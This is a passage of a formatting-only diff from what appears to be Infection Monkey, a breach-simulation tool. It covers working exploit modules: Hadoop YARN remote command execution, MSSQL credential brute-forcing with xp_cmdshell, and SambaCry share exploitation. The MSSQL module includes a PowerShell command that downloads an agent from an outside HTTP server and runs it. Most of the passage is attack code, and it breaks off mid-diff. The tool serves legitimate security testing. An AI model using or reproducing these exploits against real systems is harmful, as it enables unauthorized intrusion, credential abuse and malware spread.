# Get the newly created application id
|
# Get the newly created application id
|
||||||
resp = requests.post(posixpath.join(url, "ws/v1/cluster/apps/new-application"),
|
resp = requests.post(
|
||||||
timeout=LONG_REQUEST_TIMEOUT)
|
posixpath.join(url, "ws/v1/cluster/apps/new-application"), timeout=LONG_REQUEST_TIMEOUT
|
||||||
|
)
|
||||||
resp = json.loads(resp.content)
|
resp = json.loads(resp.content)
|
||||||
app_id = resp['application-id']
|
app_id = resp["application-id"]
|
||||||
# Create a random name for our application in YARN
|
# Create a random name for our application in YARN
|
||||||
rand_name = ID_STRING + "".join([random.choice(string.ascii_lowercase) for _ in range(self.RAN_STR_LEN)])
|
rand_name = ID_STRING + "".join(
|
||||||
|
[random.choice(string.ascii_lowercase) for _ in range(self.RAN_STR_LEN)]
|
||||||
|
)
|
||||||
payload = self.build_payload(app_id, rand_name, command)
|
payload = self.build_payload(app_id, rand_name, command)
|
||||||
resp = requests.post(posixpath.join(url, "ws/v1/cluster/apps/"), json=payload, timeout=LONG_REQUEST_TIMEOUT)
|
resp = requests.post(
|
||||||
|
posixpath.join(url, "ws/v1/cluster/apps/"), json=payload, timeout=LONG_REQUEST_TIMEOUT
|
||||||
|
)
|
||||||
return resp.status_code == 202
|
return resp.status_code == 202
|
||||||
|
|
||||||
def check_if_exploitable(self, url):
|
def check_if_exploitable(self, url):
|
||||||
try:
|
try:
|
||||||
resp = requests.post(posixpath.join(url, "ws/v1/cluster/apps/new-application"),
|
resp = requests.post(
|
||||||
timeout=LONG_REQUEST_TIMEOUT)
|
posixpath.join(url, "ws/v1/cluster/apps/new-application"),
|
||||||
|
timeout=LONG_REQUEST_TIMEOUT,
|
||||||
|
)
|
||||||
except requests.ConnectionError:
|
except requests.ConnectionError:
|
||||||
return False
|
return False
|
||||||
return resp.status_code == 200
|
return resp.status_code == 200
|
||||||
|
|
||||||
def build_command(self, path, http_path):
|
def build_command(self, path, http_path):
|
||||||
# Build command to execute
|
# Build command to execute
|
||||||
monkey_cmd = build_monkey_commandline(self.host, get_monkey_depth() - 1,
|
monkey_cmd = build_monkey_commandline(
|
||||||
vulnerable_port=HadoopExploiter.HADOOP_PORTS[0][0])
|
self.host, get_monkey_depth() - 1, vulnerable_port=HadoopExploiter.HADOOP_PORTS[0][0]
|
||||||
if 'linux' in self.host.os['type']:
|
)
|
||||||
|
if "linux" in self.host.os["type"]:
|
||||||
base_command = HADOOP_LINUX_COMMAND
|
base_command = HADOOP_LINUX_COMMAND
|
||||||
else:
|
else:
|
||||||
base_command = HADOOP_WINDOWS_COMMAND
|
base_command = HADOOP_WINDOWS_COMMAND
|
||||||
|
|
||||||
return base_command % {"monkey_path": path, "http_path": http_path,
|
return base_command % {
|
||||||
"monkey_type": MONKEY_ARG, "parameters": monkey_cmd}
|
"monkey_path": path,
|
||||||
|
"http_path": http_path,
|
||||||
|
"monkey_type": MONKEY_ARG,
|
||||||
|
"parameters": monkey_cmd,
|
||||||
|
}
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def build_payload(app_id, name, command):
|
def build_payload(app_id, name, command):
|
||||||
|
@ -97,6 +114,6 @@ class HadoopExploiter(WebRCE):
|
||||||
"command": command,
|
"command": command,
|
||||||
}
|
}
|
||||||
},
|
},
|
||||||
"application-type": "YARN"
|
"application-type": "YARN",
|
||||||
}
|
}
|
||||||
return payload
|
return payload
|
||||||
|
|
|
@ -8,7 +8,11 @@ import pymssql
|
||||||
from common.utils.exceptions import ExploitingVulnerableMachineError, FailedExploitationError
|
from common.utils.exceptions import ExploitingVulnerableMachineError, FailedExploitationError
|
||||||
from common.utils.exploit_enum import ExploitType
|
from common.utils.exploit_enum import ExploitType
|
||||||
from infection_monkey.exploit.HostExploiter import HostExploiter
|
from infection_monkey.exploit.HostExploiter import HostExploiter
|
||||||
from infection_monkey.exploit.tools.helpers import build_monkey_commandline, get_monkey_depth, get_monkey_dest_path
|
from infection_monkey.exploit.tools.helpers import (
|
||||||
|
build_monkey_commandline,
|
||||||
|
get_monkey_depth,
|
||||||
|
get_monkey_dest_path,
|
||||||
|
)
|
||||||
from infection_monkey.exploit.tools.http_tools import MonkeyHTTPServer
|
from infection_monkey.exploit.tools.http_tools import MonkeyHTTPServer
|
||||||
from infection_monkey.exploit.tools.payload_parsing import LimitedSizePayload
|
from infection_monkey.exploit.tools.payload_parsing import LimitedSizePayload
|
||||||
from infection_monkey.model import DROPPER_ARG
|
from infection_monkey.model import DROPPER_ARG
|
||||||
|
@ -17,33 +21,37 @@ LOG = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
|
||||||
class MSSQLExploiter(HostExploiter):
|
class MSSQLExploiter(HostExploiter):
|
||||||
_EXPLOITED_SERVICE = 'MSSQL'
|
_EXPLOITED_SERVICE = "MSSQL"
|
||||||
_TARGET_OS_TYPE = ['windows']
|
_TARGET_OS_TYPE = ["windows"]
|
||||||
EXPLOIT_TYPE = ExploitType.BRUTE_FORCE
|
EXPLOIT_TYPE = ExploitType.BRUTE_FORCE
|
||||||
LOGIN_TIMEOUT = 15
|
LOGIN_TIMEOUT = 15
|
||||||
# Time in seconds to wait between MSSQL queries.
|
# Time in seconds to wait between MSSQL queries.
|
||||||
QUERY_BUFFER = 0.5
|
QUERY_BUFFER = 0.5
|
||||||
SQL_DEFAULT_TCP_PORT = '1433'
|
SQL_DEFAULT_TCP_PORT = "1433"
|
||||||
|
|
||||||
# Temporary file that saves commands for monkey's download and execution.
|
# Temporary file that saves commands for monkey's download and execution.
|
||||||
TMP_FILE_NAME = 'tmp_monkey.bat'
|
TMP_FILE_NAME = "tmp_monkey.bat"
|
||||||
TMP_DIR_PATH = "%temp%\\tmp_monkey_dir"
|
TMP_DIR_PATH = "%temp%\\tmp_monkey_dir"
|
||||||
|
|
||||||
MAX_XP_CMDSHELL_COMMAND_SIZE = 128
|
MAX_XP_CMDSHELL_COMMAND_SIZE = 128
|
||||||
|
|
||||||
XP_CMDSHELL_COMMAND_START = "xp_cmdshell \""
|
XP_CMDSHELL_COMMAND_START = 'xp_cmdshell "'
|
||||||
XP_CMDSHELL_COMMAND_END = "\""
|
XP_CMDSHELL_COMMAND_END = '"'
|
||||||
EXPLOIT_COMMAND_PREFIX = "<nul set /p="
|
EXPLOIT_COMMAND_PREFIX = "<nul set /p="
|
||||||
EXPLOIT_COMMAND_SUFFIX = ">>{payload_file_path}"
|
EXPLOIT_COMMAND_SUFFIX = ">>{payload_file_path}"
|
||||||
CREATE_COMMAND_SUFFIX = ">{payload_file_path}"
|
CREATE_COMMAND_SUFFIX = ">{payload_file_path}"
|
||||||
MONKEY_DOWNLOAD_COMMAND = "powershell (new-object System.Net.WebClient)." \
|
MONKEY_DOWNLOAD_COMMAND = (
|
||||||
"DownloadFile(^\'{http_path}^\' , ^\'{dst_path}^\')"
|
"powershell (new-object System.Net.WebClient)."
|
||||||
|
"DownloadFile(^'{http_path}^' , ^'{dst_path}^')"
|
||||||
|
)
|
||||||
|
|
||||||
def __init__(self, host):
|
def __init__(self, host):
|
||||||
super(MSSQLExploiter, self).__init__(host)
|
super(MSSQLExploiter, self).__init__(host)
|
||||||
self.cursor = None
|
self.cursor = None
|
||||||
self.monkey_server = None
|
self.monkey_server = None
|
||||||
self.payload_file_path = os.path.join(MSSQLExploiter.TMP_DIR_PATH, MSSQLExploiter.TMP_FILE_NAME)
|
self.payload_file_path = os.path.join(
|
||||||
|
MSSQLExploiter.TMP_DIR_PATH, MSSQLExploiter.TMP_FILE_NAME
|
||||||
|
)
|
||||||
|
|
||||||
def _exploit_host(self):
|
def _exploit_host(self):
|
||||||
"""
|
"""
|
||||||
|
@ -52,7 +60,9 @@ class MSSQLExploiter(HostExploiter):
|
||||||
"""
|
"""
|
||||||
# Brute force to get connection
|
# Brute force to get connection
|
||||||
username_passwords_pairs_list = self._config.get_exploit_user_password_pairs()
|
username_passwords_pairs_list = self._config.get_exploit_user_password_pairs()
|
||||||
self.cursor = self.brute_force(self.host.ip_addr, self.SQL_DEFAULT_TCP_PORT, username_passwords_pairs_list)
|
self.cursor = self.brute_force(
|
||||||
|
self.host.ip_addr, self.SQL_DEFAULT_TCP_PORT, username_passwords_pairs_list
|
||||||
|
)
|
||||||
|
|
||||||
# Create dir for payload
|
# Create dir for payload
|
||||||
self.create_temp_dir()
|
self.create_temp_dir()
|
||||||
|
@ -80,11 +90,15 @@ class MSSQLExploiter(HostExploiter):
|
||||||
return self.run_mssql_command(file_running_command)
|
return self.run_mssql_command(file_running_command)
|
||||||
|
|
||||||
def create_temp_dir(self):
|
def create_temp_dir(self):
|
||||||
dir_creation_command = MSSQLLimitedSizePayload(command="mkdir {}".format(MSSQLExploiter.TMP_DIR_PATH))
|
dir_creation_command = MSSQLLimitedSizePayload(
|
||||||
|
command="mkdir {}".format(MSSQLExploiter.TMP_DIR_PATH)
|
||||||
|
)
|
||||||
self.run_mssql_command(dir_creation_command)
|
self.run_mssql_command(dir_creation_command)
|
||||||
|
|
||||||
def create_empty_payload_file(self):
|
def create_empty_payload_file(self):
|
||||||
suffix = MSSQLExploiter.CREATE_COMMAND_SUFFIX.format(payload_file_path=self.payload_file_path)
|
suffix = MSSQLExploiter.CREATE_COMMAND_SUFFIX.format(
|
||||||
|
payload_file_path=self.payload_file_path
|
||||||
|
)
|
||||||
tmp_file_creation_command = MSSQLLimitedSizePayload(command="NUL", suffix=suffix)
|
tmp_file_creation_command = MSSQLLimitedSizePayload(command="NUL", suffix=suffix)
|
||||||
self.run_mssql_command(tmp_file_creation_command)
|
self.run_mssql_command(tmp_file_creation_command)
|
||||||
|
|
||||||
|
@ -111,9 +125,13 @@ class MSSQLExploiter(HostExploiter):
|
||||||
|
|
||||||
def remove_temp_dir(self):
|
def remove_temp_dir(self):
|
||||||
# Remove temporary dir we stored payload at
|
# Remove temporary dir we stored payload at
|
||||||
tmp_file_removal_command = MSSQLLimitedSizePayload(command="del {}".format(self.payload_file_path))
|
tmp_file_removal_command = MSSQLLimitedSizePayload(
|
||||||
|
command="del {}".format(self.payload_file_path)
|
||||||
|
)
|
||||||
self.run_mssql_command(tmp_file_removal_command)
|
self.run_mssql_command(tmp_file_removal_command)
|
||||||
tmp_dir_removal_command = MSSQLLimitedSizePayload(command="rmdir {}".format(MSSQLExploiter.TMP_DIR_PATH))
|
tmp_dir_removal_command = MSSQLLimitedSizePayload(
|
||||||
|
command="rmdir {}".format(MSSQLExploiter.TMP_DIR_PATH)
|
||||||
|
)
|
||||||
self.run_mssql_command(tmp_dir_removal_command)
|
self.run_mssql_command(tmp_dir_removal_command)
|
||||||
|
|
||||||
def start_monkey_server(self):
|
def start_monkey_server(self):
|
||||||
|
@ -131,25 +149,29 @@ class MSSQLExploiter(HostExploiter):
|
||||||
def get_monkey_launch_command(self):
|
def get_monkey_launch_command(self):
|
||||||
dst_path = get_monkey_dest_path(self.monkey_server.http_path)
|
dst_path = get_monkey_dest_path(self.monkey_server.http_path)
|
||||||
# Form monkey's launch command
|
# Form monkey's launch command
|
||||||
monkey_args = build_monkey_commandline(self.host,
|
monkey_args = build_monkey_commandline(
|
||||||
get_monkey_depth() - 1,
|
self.host, get_monkey_depth() - 1, MSSQLExploiter.SQL_DEFAULT_TCP_PORT, dst_path
|
||||||
MSSQLExploiter.SQL_DEFAULT_TCP_PORT,
|
)
|
||||||
dst_path)
|
|
||||||
suffix = ">>{}".format(self.payload_file_path)
|
suffix = ">>{}".format(self.payload_file_path)
|
||||||
prefix = MSSQLExploiter.EXPLOIT_COMMAND_PREFIX
|
prefix = MSSQLExploiter.EXPLOIT_COMMAND_PREFIX
|
||||||
return MSSQLLimitedSizePayload(command="{} {} {}".format(dst_path, DROPPER_ARG, monkey_args),
|
return MSSQLLimitedSizePayload(
|
||||||
prefix=prefix,
|
command="{} {} {}".format(dst_path, DROPPER_ARG, monkey_args),
|
||||||
suffix=suffix)
|
prefix=prefix,
|
||||||
|
suffix=suffix,
|
||||||
|
)
|
||||||
|
|
||||||
def get_monkey_download_command(self):
|
def get_monkey_download_command(self):
|
||||||
dst_path = get_monkey_dest_path(self.monkey_server.http_path)
|
dst_path = get_monkey_dest_path(self.monkey_server.http_path)
|
||||||
monkey_download_command = MSSQLExploiter.MONKEY_DOWNLOAD_COMMAND. \
|
monkey_download_command = MSSQLExploiter.MONKEY_DOWNLOAD_COMMAND.format(
|
||||||
format(http_path=self.monkey_server.http_path, dst_path=dst_path)
|
http_path=self.monkey_server.http_path, dst_path=dst_path
|
||||||
|
)
|
||||||
prefix = MSSQLExploiter.EXPLOIT_COMMAND_PREFIX
|
prefix = MSSQLExploiter.EXPLOIT_COMMAND_PREFIX
|
||||||
suffix = MSSQLExploiter.EXPLOIT_COMMAND_SUFFIX.format(payload_file_path=self.payload_file_path)
|
suffix = MSSQLExploiter.EXPLOIT_COMMAND_SUFFIX.format(
|
||||||
return MSSQLLimitedSizePayload(command=monkey_download_command,
|
payload_file_path=self.payload_file_path
|
||||||
suffix=suffix,
|
)
|
||||||
prefix=prefix)
|
return MSSQLLimitedSizePayload(
|
||||||
|
command=monkey_download_command, suffix=suffix, prefix=prefix
|
||||||
|
)
|
||||||
|
|
||||||
def brute_force(self, host, port, users_passwords_pairs_list):
|
def brute_force(self, host, port, users_passwords_pairs_list):
|
||||||
"""
|
"""
|
||||||
|
@ -170,10 +192,14 @@ class MSSQLExploiter(HostExploiter):
|
||||||
try:
|
try:
|
||||||
# Core steps
|
# Core steps
|
||||||
# Trying to connect
|
# Trying to connect
|
||||||
conn = pymssql.connect(host, user, password, port=port, login_timeout=self.LOGIN_TIMEOUT)
|
conn = pymssql.connect(
|
||||||
|
host, user, password, port=port, login_timeout=self.LOGIN_TIMEOUT
|
||||||
|
)
|
||||||
LOG.info(
|
LOG.info(
|
||||||
'Successfully connected to host: {0}, using user: {1}, password (SHA-512): {2}'.format(
|
"Successfully connected to host: {0}, using user: {1}, password (SHA-512): {2}".format(
|
||||||
host, user, self._config.hash_sensitive_data(password)))
|
host, user, self._config.hash_sensitive_data(password)
|
||||||
|
)
|
||||||
|
)
|
||||||
self.add_vuln_port(MSSQLExploiter.SQL_DEFAULT_TCP_PORT)
|
self.add_vuln_port(MSSQLExploiter.SQL_DEFAULT_TCP_PORT)
|
||||||
self.report_login_attempt(True, user, password)
|
self.report_login_attempt(True, user, password)
|
||||||
cursor = conn.cursor()
|
cursor = conn.cursor()
|
||||||
|
@ -183,14 +209,20 @@ class MSSQLExploiter(HostExploiter):
|
||||||
# Combo didn't work, hopping to the next one
|
# Combo didn't work, hopping to the next one
|
||||||
pass
|
pass
|
||||||
|
|
||||||
LOG.warning('No user/password combo was able to connect to host: {0}:{1}, '
|
LOG.warning(
|
||||||
'aborting brute force'.format(host, port))
|
"No user/password combo was able to connect to host: {0}:{1}, "
|
||||||
raise FailedExploitationError("Bruteforce process failed on host: {0}".format(self.host.ip_addr))
|
"aborting brute force".format(host, port)
|
||||||
|
)
|
||||||
|
raise FailedExploitationError(
|
||||||
|
"Bruteforce process failed on host: {0}".format(self.host.ip_addr)
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
class MSSQLLimitedSizePayload(LimitedSizePayload):
|
class MSSQLLimitedSizePayload(LimitedSizePayload):
|
||||||
def __init__(self, command, prefix="", suffix=""):
|
def __init__(self, command, prefix="", suffix=""):
|
||||||
super(MSSQLLimitedSizePayload, self).__init__(command=command,
|
super(MSSQLLimitedSizePayload, self).__init__(
|
||||||
max_length=MSSQLExploiter.MAX_XP_CMDSHELL_COMMAND_SIZE,
|
command=command,
|
||||||
prefix=MSSQLExploiter.XP_CMDSHELL_COMMAND_START + prefix,
|
max_length=MSSQLExploiter.MAX_XP_CMDSHELL_COMMAND_SIZE,
|
||||||
suffix=suffix + MSSQLExploiter.XP_CMDSHELL_COMMAND_END)
|
prefix=MSSQLExploiter.XP_CMDSHELL_COMMAND_START + prefix,
|
||||||
|
suffix=suffix + MSSQLExploiter.XP_CMDSHELL_COMMAND_END,
|
||||||
|
)
|
||||||
|
|
|
@ -8,24 +8,46 @@ from io import BytesIO
|
||||||
import impacket.smbconnection
|
import impacket.smbconnection
|
||||||
from impacket.nmb import NetBIOSError
|
from impacket.nmb import NetBIOSError
|
||||||
from impacket.nt_errors import STATUS_SUCCESS
|
from impacket.nt_errors import STATUS_SUCCESS
|
||||||
from impacket.smb import (FILE_DIRECTORY_FILE, FILE_NON_DIRECTORY_FILE, FILE_OPEN, FILE_READ_DATA, FILE_SHARE_READ,
|
from impacket.smb import (
|
||||||
FILE_WRITE_DATA, SMB, SMB_DIALECT, SessionError, SMBCommand, SMBNtCreateAndX_Data,
|
FILE_DIRECTORY_FILE,
|
||||||
SMBNtCreateAndX_Parameters)
|
FILE_NON_DIRECTORY_FILE,
|
||||||
from impacket.smb3structs import (SMB2_CREATE, SMB2_FLAGS_DFS_OPERATIONS, SMB2_IL_IMPERSONATION, SMB2_OPLOCK_LEVEL_NONE,
|
FILE_OPEN,
|
||||||
SMB2Create, SMB2Create_Response, SMB2Packet)
|
FILE_READ_DATA,
|
||||||
|
FILE_SHARE_READ,
|
||||||
|
FILE_WRITE_DATA,
|
||||||
|
SMB,
|
||||||
|
SMB_DIALECT,
|
||||||
|
SessionError,
|
||||||
|
SMBCommand,
|
||||||
|
SMBNtCreateAndX_Data,
|
||||||
|
SMBNtCreateAndX_Parameters,
|
||||||
|
)
|
||||||
|
from impacket.smb3structs import (
|
||||||
|
SMB2_CREATE,
|
||||||
|
SMB2_FLAGS_DFS_OPERATIONS,
|
||||||
|
SMB2_IL_IMPERSONATION,
|
||||||
|
SMB2_OPLOCK_LEVEL_NONE,
|
||||||
|
SMB2Create,
|
||||||
|
SMB2Create_Response,
|
||||||
|
SMB2Packet,
|
||||||
|
)
|
||||||
from impacket.smbconnection import SMBConnection
|
from impacket.smbconnection import SMBConnection
|
||||||
|
|
||||||
import infection_monkey.monkeyfs as monkeyfs
|
import infection_monkey.monkeyfs as monkeyfs
|
||||||
from common.utils.attack_utils import ScanStatus
|
from common.utils.attack_utils import ScanStatus
|
||||||
from infection_monkey.exploit.HostExploiter import HostExploiter
|
from infection_monkey.exploit.HostExploiter import HostExploiter
|
||||||
from infection_monkey.exploit.tools.helpers import build_monkey_commandline, get_monkey_depth, get_target_monkey_by_os
|
from infection_monkey.exploit.tools.helpers import (
|
||||||
|
build_monkey_commandline,
|
||||||
|
get_monkey_depth,
|
||||||
|
get_target_monkey_by_os,
|
||||||
|
)
|
||||||
from infection_monkey.model import DROPPER_ARG
|
from infection_monkey.model import DROPPER_ARG
|
||||||
from infection_monkey.network.smbfinger import SMB_SERVICE
|
from infection_monkey.network.smbfinger import SMB_SERVICE
|
||||||
from infection_monkey.network.tools import get_interface_to_target
|
from infection_monkey.network.tools import get_interface_to_target
|
||||||
from infection_monkey.pyinstaller_utils import get_binary_file_path
|
from infection_monkey.pyinstaller_utils import get_binary_file_path
|
||||||
from infection_monkey.telemetry.attack.t1105_telem import T1105Telem
|
from infection_monkey.telemetry.attack.t1105_telem import T1105Telem
|
||||||
|
|
||||||
__author__ = 'itay.mizeretz'
|
__author__ = "itay.mizeretz"
|
||||||
|
|
||||||
LOG = logging.getLogger(__name__)
|
LOG = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
@ -36,7 +58,7 @@ class SambaCryExploiter(HostExploiter):
|
||||||
https://github.com/CoreSecurity/impacket/blob/master/examples/sambaPipe.py
|
https://github.com/CoreSecurity/impacket/blob/master/examples/sambaPipe.py
|
||||||
"""
|
"""
|
||||||
|
|
||||||
_TARGET_OS_TYPE = ['linux']
|
_TARGET_OS_TYPE = ["linux"]
|
||||||
_EXPLOITED_SERVICE = "Samba"
|
_EXPLOITED_SERVICE = "Samba"
|
||||||
# Name of file which contains the monkey's commandline
|
# Name of file which contains the monkey's commandline
|
||||||
SAMBACRY_COMMANDLINE_FILENAME = "monkey_commandline.txt"
|
SAMBACRY_COMMANDLINE_FILENAME = "monkey_commandline.txt"
|
||||||
|
@ -65,8 +87,10 @@ class SambaCryExploiter(HostExploiter):
|
||||||
return False
|
return False
|
||||||
|
|
||||||
writable_shares_creds_dict = self.get_writable_shares_creds_dict(self.host.ip_addr)
|
writable_shares_creds_dict = self.get_writable_shares_creds_dict(self.host.ip_addr)
|
||||||
LOG.info("Writable shares and their credentials on host %s: %s" %
|
LOG.info(
|
||||||
(self.host.ip_addr, str(writable_shares_creds_dict)))
|
"Writable shares and their credentials on host %s: %s"
|
||||||
|
% (self.host.ip_addr, str(writable_shares_creds_dict))
|
||||||
|
)
|
||||||
|
|
||||||
self.exploit_info["shares"] = {}
|
self.exploit_info["shares"] = {}
|
||||||
for share in writable_shares_creds_dict:
|
for share in writable_shares_creds_dict:
|
||||||
|
@ -79,16 +103,25 @@ class SambaCryExploiter(HostExploiter):
|
||||||
successfully_triggered_shares = []
|
successfully_triggered_shares = []
|
||||||
|
|
||||||
for share in writable_shares_creds_dict:
|
for share in writable_shares_creds_dict:
|
||||||
trigger_result = self.get_trigger_result(self.host.ip_addr, share, writable_shares_creds_dict[share])
|
trigger_result = self.get_trigger_result(
|
||||||
|
self.host.ip_addr, share, writable_shares_creds_dict[share]
|
||||||
|
)
|
||||||
creds = writable_shares_creds_dict[share]
|
creds = writable_shares_creds_dict[share]
|
||||||
self.report_login_attempt(
|
self.report_login_attempt(
|
||||||
trigger_result is not None, creds['username'], creds['password'], creds['lm_hash'], creds['ntlm_hash'])
|
trigger_result is not None,
|
||||||
|
creds["username"],
|
||||||
|
creds["password"],
|
||||||
|
creds["lm_hash"],
|
||||||
|
creds["ntlm_hash"],
|
||||||
|
)
|
||||||
if trigger_result is not None:
|
if trigger_result is not None:
|
||||||
successfully_triggered_shares.append((share, trigger_result))
|
successfully_triggered_shares.append((share, trigger_result))
|
||||||
url = "smb://%(username)s@%(host)s:%(port)s/%(share_name)s" % {'username': creds['username'],
|
url = "smb://%(username)s@%(host)s:%(port)s/%(share_name)s" % {
|
||||||
'host': self.host.ip_addr,
|
"username": creds["username"],
|
||||||
'port': self.SAMBA_PORT,
|
"host": self.host.ip_addr,
|
||||||
'share_name': share}
|
"port": self.SAMBA_PORT,
|
||||||
|
"share_name": share,
|
||||||
|
}
|
||||||
self.add_vuln_url(url)
|
self.add_vuln_url(url)
|
||||||
self.clean_share(self.host.ip_addr, share, writable_shares_creds_dict[share])
|
self.clean_share(self.host.ip_addr, share, writable_shares_creds_dict[share])
|
||||||
|
|
||||||
|
@ -97,8 +130,9 @@ class SambaCryExploiter(HostExploiter):
|
||||||
|
|
||||||
if len(successfully_triggered_shares) > 0:
|
if len(successfully_triggered_shares) > 0:
|
||||||
LOG.info(
|
LOG.info(
|
||||||
"Shares triggered successfully on host %s: %s" % (
|
"Shares triggered successfully on host %s: %s"
|
||||||
self.host.ip_addr, str(successfully_triggered_shares)))
|
% (self.host.ip_addr, str(successfully_triggered_shares))
|
||||||
|
)
|
||||||
self.add_vuln_port(self.SAMBA_PORT)
|
self.add_vuln_port(self.SAMBA_PORT)
|
||||||
return True
|
return True
|
||||||
else:
|
else:
|
||||||
|
@ -117,8 +151,9 @@ class SambaCryExploiter(HostExploiter):
|
||||||
self.trigger_module(smb_client, share)
|
self.trigger_module(smb_client, share)
|
||||||
except (impacket.smbconnection.SessionError, SessionError):
|
except (impacket.smbconnection.SessionError, SessionError):
|
||||||
LOG.debug(
|
LOG.debug(
|
||||||
"Exception trying to exploit host: %s, share: %s, with creds: %s." % (
|
"Exception trying to exploit host: %s, share: %s, with creds: %s."
|
||||||
self.host.ip_addr, share, str(creds)))
|
% (self.host.ip_addr, share, str(creds))
|
||||||
|
)
|
||||||
|
|
||||||
def clean_share(self, ip, share, creds):
|
def clean_share(self, ip, share, creds):
|
||||||
"""
|
"""
|
||||||
|
@ -129,9 +164,14 @@ class SambaCryExploiter(HostExploiter):
|
||||||
"""
|
"""
|
||||||
smb_client = self.connect_to_server(ip, creds)
|
smb_client = self.connect_to_server(ip, creds)
|
||||||
tree_id = smb_client.connectTree(share)
|
tree_id = smb_client.connectTree(share)
|
||||||
file_list = [self.SAMBACRY_COMMANDLINE_FILENAME, self.SAMBACRY_RUNNER_RESULT_FILENAME,
|
file_list = [
|
||||||
self.SAMBACRY_RUNNER_FILENAME_32, self.SAMBACRY_RUNNER_FILENAME_64,
|
self.SAMBACRY_COMMANDLINE_FILENAME,
|
||||||
self.SAMBACRY_MONKEY_FILENAME_32, self.SAMBACRY_MONKEY_FILENAME_64]
|
self.SAMBACRY_RUNNER_RESULT_FILENAME,
|
||||||
|
self.SAMBACRY_RUNNER_FILENAME_32,
|
||||||
|
self.SAMBACRY_RUNNER_FILENAME_64,
|
||||||
|
self.SAMBACRY_MONKEY_FILENAME_32,
|
||||||
|
self.SAMBACRY_MONKEY_FILENAME_64,
|
||||||
|
]
|
||||||
|
|
||||||
for filename in file_list:
|
for filename in file_list:
|
||||||
try:
|
try:
|
||||||
|
@ -153,8 +193,9 @@ class SambaCryExploiter(HostExploiter):
|
||||||
tree_id = smb_client.connectTree(share)
|
tree_id = smb_client.connectTree(share)
|
||||||
file_content = None
|
file_content = None
|
||||||
try:
|
try:
|
||||||
file_id = smb_client.openFile(tree_id, "\\%s" % self.SAMBACRY_RUNNER_RESULT_FILENAME,
|
file_id = smb_client.openFile(
|
||||||
desiredAccess=FILE_READ_DATA)
|
tree_id, "\\%s" % self.SAMBACRY_RUNNER_RESULT_FILENAME, desiredAccess=FILE_READ_DATA
|
||||||
|
)
|
||||||
file_content = smb_client.readFile(tree_id, file_id)
|
file_content = smb_client.readFile(tree_id, file_id)
|
||||||
smb_client.closeFile(tree_id, file_id)
|
smb_client.closeFile(tree_id, file_id)
|
||||||
except (impacket.smbconnection.SessionError, SessionError):
|
except (impacket.smbconnection.SessionError, SessionError):
|
||||||
|
@ -193,16 +234,18 @@ class SambaCryExploiter(HostExploiter):
|
||||||
def get_credentials_list(self):
|
def get_credentials_list(self):
|
||||||
creds = self._config.get_exploit_user_password_or_hash_product()
|
creds = self._config.get_exploit_user_password_or_hash_product()
|
||||||
|
|
||||||
creds = [{'username': user, 'password': password, 'lm_hash': lm_hash, 'ntlm_hash': ntlm_hash}
|
creds = [
|
||||||
for user, password, lm_hash, ntlm_hash in creds]
|
{"username": user, "password": password, "lm_hash": lm_hash, "ntlm_hash": ntlm_hash}
|
||||||
|
for user, password, lm_hash, ntlm_hash in creds
|
||||||
|
]
|
||||||
|
|
||||||
# Add empty credentials for anonymous shares.
|
# Add empty credentials for anonymous shares.
|
||||||
creds.insert(0, {'username': '', 'password': '', 'lm_hash': '', 'ntlm_hash': ''})
|
creds.insert(0, {"username": "", "password": "", "lm_hash": "", "ntlm_hash": ""})
|
||||||
|
|
||||||
return creds
|
return creds
|
||||||
|
|
||||||
def list_shares(self, smb_client):
|
def list_shares(self, smb_client):
|
||||||
shares = [x['shi1_netname'][:-1] for x in smb_client.listShares()]
|
shares = [x["shi1_netname"][:-1] for x in smb_client.listShares()]
|
||||||
return [x for x in shares if x not in self._config.sambacry_shares_not_to_check]
|
return [x for x in shares if x not in self._config.sambacry_shares_not_to_check]
|
||||||
|
|
||||||
def is_vulnerable(self):
|
def is_vulnerable(self):
|
||||||
|
@ -214,8 +257,8 @@ class SambaCryExploiter(HostExploiter):
|
||||||
LOG.info("Host: %s doesn't have SMB open" % self.host.ip_addr)
|
LOG.info("Host: %s doesn't have SMB open" % self.host.ip_addr)
|
||||||
return False
|
return False
|
||||||
|
|
||||||
pattern = re.compile(r'\d*\.\d*\.\d*')
|
pattern = re.compile(r"\d*\.\d*\.\d*")
|
||||||
smb_server_name = self.host.services[SMB_SERVICE].get('name')
|
smb_server_name = self.host.services[SMB_SERVICE].get("name")
|
||||||
if not smb_server_name:
|
if not smb_server_name:
|
||||||
LOG.info("Host: %s refused SMB connection" % self.host.ip_addr)
|
LOG.info("Host: %s refused SMB connection" % self.host.ip_addr)
|
||||||
return False
|
return False
|
||||||
|
@ -223,27 +266,38 @@ class SambaCryExploiter(HostExploiter):
|
||||||
pattern_result = pattern.search(smb_server_name)
|
pattern_result = pattern.search(smb_server_name)
|
||||||
is_vulnerable = False
|
is_vulnerable = False
|
||||||
if pattern_result is not None:
|
if pattern_result is not None:
|
||||||
samba_version = smb_server_name[pattern_result.start():pattern_result.end()]
|
samba_version = smb_server_name[pattern_result.start() : pattern_result.end()]
|
||||||
samba_version_parts = samba_version.split('.')
|
samba_version_parts = samba_version.split(".")
|
||||||
if (samba_version_parts[0] == "3") and (samba_version_parts[1] >= "5"):
|
if (samba_version_parts[0] == "3") and (samba_version_parts[1] >= "5"):
|
||||||
is_vulnerable = True
|
is_vulnerable = True
|
||||||
elif (samba_version_parts[0] == "4") and (samba_version_parts[1] <= "3"):
|
elif (samba_version_parts[0] == "4") and (samba_version_parts[1] <= "3"):
|
||||||
is_vulnerable = True
|
is_vulnerable = True
|
||||||
elif (samba_version_parts[0] == "4") and (samba_version_parts[1] == "4") and (
|
elif (
|
||||||
samba_version_parts[1] <= "13"):
|
(samba_version_parts[0] == "4")
|
||||||
|
and (samba_version_parts[1] == "4")
|
||||||
|
and (samba_version_parts[1] <= "13")
|
||||||
|
):
|
||||||
is_vulnerable = True
|
is_vulnerable = True
|
||||||
elif (samba_version_parts[0] == "4") and (samba_version_parts[1] == "5") and (
|
elif (
|
||||||
samba_version_parts[1] <= "9"):
|
(samba_version_parts[0] == "4")
|
||||||
|
and (samba_version_parts[1] == "5")
|
||||||
|
and (samba_version_parts[1] <= "9")
|
||||||
|
):
|
||||||
is_vulnerable = True
|
is_vulnerable = True
|
||||||
elif (samba_version_parts[0] == "4") and (samba_version_parts[1] == "6") and (
|
elif (
|
||||||
samba_version_parts[1] <= "3"):
|
